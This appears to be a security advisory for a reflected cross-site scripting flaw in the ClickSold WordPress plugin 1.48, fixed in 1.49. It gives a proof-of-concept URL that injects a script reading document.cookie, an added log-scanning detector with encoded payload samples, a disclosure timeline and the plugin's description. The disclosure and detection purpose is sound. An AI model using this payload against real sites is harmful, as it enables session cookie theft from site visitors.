wp-plugin : clicksold-wordpress-plugin

Plugin Details
Plugin Name: wp-plugin : clicksold-wordpress-plugin
Affected Version : 1.48 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
 http://localhost/wp-content/plugins/clicksold-wordpress-plugin/cs_listing_404_page_editor.php?id=id'><script>alert(document.cookie)</script>&
Vulnerable Parameter : id
Fixed Version : 1.49
Type of XSS : Reflected
Trac Changelog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=834036%40clicksold-wordpress-plugin&old=820059%40clicksold-wordpress-plugin&sfp_email=&sfph_mail=#file2
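
A defender-side check for the request pattern shown in the PoC, added here as an example (it is not part of the original advisory or the plugin's code): it scans web server access-log lines for requests to the vulnerable file whose id parameter decodes to HTML metacharacters. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# File and parameter named in the advisory above.
ENDPOINT = "/clicksold-wordpress-plugin/cs_listing_404_page_editor.php"
PARAM = "id"
# Characters that let a value break out of an HTML attribute or tag.
HTML_META = re.compile(r"[<>'\"]")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Undo nested percent-encoding, e.g. %253C -> %3C -> <."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_id(log_line):
    """Return the decoded id value if the request targets the plugin file
    and id contains HTML metacharacters; otherwise return None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith(ENDPOINT):
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        value = decode_fully(raw)
        if HTML_META.search(value):
            return value
    return None

# Constructed sample log lines (documentation IP addresses, not real traffic).
PREFIX = '203.0.113.9 - - [07/Jul/2014:10:00:00 +0000] "GET '
PLUGIN = "/wp-content/plugins" + ENDPOINT
SAMPLE_LOG = [
    PREFIX + PLUGIN + '?id=42 HTTP/1.1" 200 512',
    PREFIX + PLUGIN + '?id=id%27%3E%3Cscript%3Ealert(document.cookie)'
                      '%3C/script%3E& HTTP/1.1" 200 640',
    PREFIX + PLUGIN + '?id=x%2527%253E HTTP/1.1" 200 640',  # double-encoded
    PREFIX + '/index.php?id=%3Cb%3E HTTP/1.1" 200 100',      # other file
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_id(line))
```

A hit only shows that such a request reached the server; whether it was reflected depends on the installed plugin version (1.48 affected, 1.49 fixed).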


Disclosure Timeline
Vendor Contacted : 2014-01-04
Plugin Status : Updated on 2014-01-11
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
ClickSold adds real estate related features to Agent and Brokerage websites built on WordPress. Features include:

* Adding / Displaying real estate listings
* Adding Team members / office agents
* Customizable real estate widgets
* Optional MLS® Integration
* Mobile listing browsing and searching
* Search Engine Optimized design

**See ClickSold in Action**

* Responsive Design: [Eleven40 Theme](http://eleven40demo.clicksold.com/)
* Gorgeous IDX Search: [Associate Theme](http://associatedemo.clicksold.com/mls-search/)

**How Much?** From FREE to $45/month.

**Work with REALTORS®?** Sign up to become a ClickSold Affiliate and earn revenue from every Silver, Gold or Platinum ClickSold plugin you use.

* ClickSold Affiliate Program: [Click Here](http://www.clicksold.com/affiliate-program/)
* Our Existing Affiliates: [Click Here](http://www.clicksold.com/our-affiliates/)